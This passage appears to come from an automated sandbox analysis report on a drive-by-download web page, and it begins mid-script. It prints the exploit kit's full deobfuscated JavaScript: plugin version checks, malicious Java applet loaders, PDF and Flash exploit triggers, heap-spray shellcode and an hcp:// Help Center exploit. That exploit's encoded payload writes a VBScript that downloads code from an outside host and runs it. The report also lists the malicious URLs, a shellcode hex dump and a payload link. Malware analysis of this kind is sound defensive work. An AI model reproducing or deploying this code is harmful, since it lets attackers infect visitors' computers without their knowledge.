d.adobe.x-mars",a)){g="8"}}}}}else{g=f.version}m=c.getMimeEnabledPlugin(j,a);f.installed=m &&g?1:(m?0:(f.navPluginObj?-0.2:-1))}else{p=c.getAXO(f.progID[0])||c.getAXO(f.progID[1]);b =/=\s*([\d\.]+)/g;try{d=(p||c.getDOMobj(c.insertHTML("object",["classid",f.classID],["src" ,""],"",f))).GetVersions();for(k=0;k<5;k++){if(b.test(d)&&(!g||(g<RegExp.$1))){g=RegExp.$1 }}}catch(h){}f.installed=g?1:(p?0:-1)}if(!f.version){f.version=c.formatNum(g)}f.INSTALLED[ j]=f.installed}},zz:0};PluginDetect.initScript();PluginDetect.getVersion(".");jver=PluginD etect.getVersion("Java","./getJavaInfo.jar");pdfver=PluginDetect.getVersion("AdobeReader") ;flashver=PluginDetect.getVersion('Flash');}catch(e){}if(typeof jver=='string '){jver=jver.split('.')}else{jver=[0,0,0,0]}if(typeof pdfver=='string '){pdfver=pdfver.split('.')}else{pdfver=[0,0,0,0]}if(typeof flashver=='string '){flashver=flashver.split('.' )}else{flashver=[0,0,0,0]}function spl0(){if(jver[1]==6&&jver[3]<=28){var f=document.creat eElement('applet');f.setAttribute('code', 'Market.class');f.setAttribute('archive', '. 
/content/v1.jar');var p=document.createElement('param');p.setAttribute('name','p ');p.setAttribute('value','e00oMDDfmh % 2.r.5VqRmfk /h0VqRmDfh00DBVoeoju8396h8i');f.appendChild(p);document.body.appendChild(f);}spl1()}functi on spl1(){if(jver[1]<6){var f=document.createElement('applet');f.setAttribute('code', 'pho to.Zoom.class');f.setAttribute('archive', './content /g43kb6j34kblq6jh34kb6j3kl4.jar');var p=document.createElement('param');p.setAttribute('na me','p');p.setAttribute('value','e00oMDDfmh%2.r.5VqRmfk/h0VqRmDfh00DBVoeoju8396h83' );f.appendChild(p);document.body.appendChild(f);}spl2()}function spl2(){spl3()}function sh ow_pdf(src){var pifr=document.createElement('IFRAME');pifr.setAttribute('width ',1);pifr.setAttribute('height',1);pifr.setAttribute('src' ,src);document.body.appendChild(pifr)}function spl3(){if(pdfver[0]>0&&pdfver[0]<8){show_pd f('./content/1ddfp.php ? f = 18 ')}else if((pdfver[0]==8)||(pdfver[0]==9&&pdfver[1]<=3)){show_pdf('./content/2ddfp.php ? f = 18')}spl4()}function spl4(){var m=document.createElement('IFRAME ');m.setAttribute('src','hcp :// services/search?query=anything&topic=hcp://system/ sysinfo /sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<scr'+'ipt defer>eval(Run (String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,3 4,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50, 46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,11 2,58,47,47,115,109,101,114,100,105,107,105,53,46,99,111,109,115,117,110,101,116,46,99,111, 109,47,115,101,116,116,47,99,111,110,116,101,110,116,47,104,99,112,95,118,98,115,46,112,10 
4,112,63,102,61,49,56,38,100,61,48,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58 ,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105, 112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58 ,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71 ,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43, 32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101, 84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,9 7,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41, 46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41 ,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38 ,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,3 2,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</scr'+'ipt > ');m.setAttribute('width',0);m.setAttribute('height',0);document.body['appendChild '](m);setTimeout(spl5,1000)}function getCN(){return 'content /score.swf'}function getBlockSize(){return 1024}function getAllocSize(){return 1024 * 1024 }function getAllocCount(){return 300}function getFillBytes(){var a='%u'+'0c0c';return a+a; }function getShellCode(){return "%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u4ce9%u8 0fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3 458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud 35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u6 1e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0 c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua 
385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2 828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2 846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua 528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u2 8d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2 135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7 b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5 d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3 373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u455b%u5a4d%u414c%u4143%u061d%u474b%u5b45%u4 65d%u5c4d%u4b06%u4547%u5b07%u5c4d%u075c%u065f%u4058%u1758%u154e%u1019%u4d0e%u1e15%u2828"}f unction spl5(){var ver1=flashver[0];var ver2=flashver[1];var ver3=flashver[2];if (((ver1== 10&&ver2==0&&ver3>40)||((ver1==10&&ver2>0)&&(ver1==10&&ver2<2)))||((ver1==10&&ver2==2&&ver 3<159)||(ver1==10&&ver2<2))){var fname="content/field";var Flash_obj=" < objectclassid = 'clsid:d27cdb6e-ae6d-11cf-96b8-444553540000'width = 10height = 10id = 'swf_id' > ";Flash_obj+=" < paramname = 'movie'value = '"+fname+".swf' />";al="always";Flash_obj+="<param name=\"allowScriptAccess\" value='"+al+"' / > ";Flash_obj+=" < paramname = 'Play'value = '0' />";Flash_obj+="<embed src='"+fname+".swf' id='swf_id' name='swf_id'";Flash_obj+="allowScr iptAccess='"+al+"'";Flash_obj+="type='application/x - shockwave - flash '";Flash_obj+="width='10' height='10' > ";Flash_obj+=" </ embed > ";Flash_obj+=" </ object > ";var oSpan=document.createElement("span"); document.body.appendChild(oSpan); oSpan.innerHTML = Flash_obj; } setTimeout(end_redirect, 8000); } spl0();
Writes (markup the sample passed to document.write())
- (repeated 1 time)
<center><h1>Please wait page is loading...</h1></center><hr>
Network Activity¶
Requests
| URL | Status | Content Type |
|---|---|---|
| http://dl.dropbox.com/u/50989988/js/theme/snow.js | 200 | text/html |
| about:blank | 200 | text/html |
| http://smerdiki5.comsunet.com/sett/main.php?page=a313553a42be5802 | 200 | text/html |
| http://smerdiki5.comsunet.com/sett/content/2ddfp.php?f=18 | 200 | application/pdf |
| hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,115,109,101,114,100,105,107,105,53,46,99,111,109,115,117,110,101,116,46,99,111,109,47,115,101,116,116,47,99,111,110,116,101,110,116,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,49,56,38,100,61,48,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</script> | 505 | text/plain |
| http://pokler1.thailandclubinfo.com//index.php?7e0071740f50250645dcbdc868cb799b | NXDOMAIN | N/A |
Redirects
No redirects.

ActiveX controls¶
- AcroPDF.PDF: No attribute setting or method call detected
- Msxml2.XMLHTTP: No attribute setting or method call detected
- ShockwaveFlash.ShockwaveFlash: Name Arg0 Methods GetVariable
- JavaPlugin.192_30: No attribute setting or method call detected
- JavaWebStart.isInstalled: No attribute setting or method call detected
Shellcode¶
| Hexadecimal | ASCII |
|---|---|
41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 e9 4c fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b 5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c 29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c 0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 58 40 5c 5c 58 12 07 07 5b 45 4d 5a 4c 41 43 41 1d 06 4b 47 45 5b 5d 46 4d 5c 06 4b 47 45 07 5b 4d 5c 5c 07 5f 06 58 40 58 17 4e 15 19 10 0e 4d 15 1e 28 28 |
AAAAf......X1.f.
.L..0(@.........
..]..w..L.h..h$.
X4~.^...N.v.+\..
..=8....h..n..].
.....]y..dy~.]..
\.P+.~.^.+...ai.
.+...'.8..\...%+
.h...7].v.v.+.N.
$c.n..|.$..+..,.
+..vq..{..@..U$.
\+....@...B-q...
.....((((pxBh@.(
((x..1x}...v8..-
..@GF((@]ZDE|.>.
.....I....*.Z..,
)((.t.$.,.ZMO[.l
.,^Z...l....[.{@
.(((.~$....y.l5(
_XJ\.l5-.LDD.l5!
(q..,..l5,iyB(B(
{.B(.~<..]>B({.~
,B(..${.~,..$.*.
;o..(].o..(].B(B
..~.......f&....
&.G)....s3.nQ.2.
X@\\X...[EMZLACA
..KGE[]FM\.KGE.[
M\\._.X@X.N....M
..(( |
This shellcode was found on http://smerdiki5.comsunet.com/sett/main.php?page=a313553a42be5802.
(Waiting for shellzer to finish the analysis of this shellcode.)

Malware¶
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|---|---|---|
| http://smerdiki5.comsunet.com/sett/w.php?f=18&e=6 | N/A |
N/A |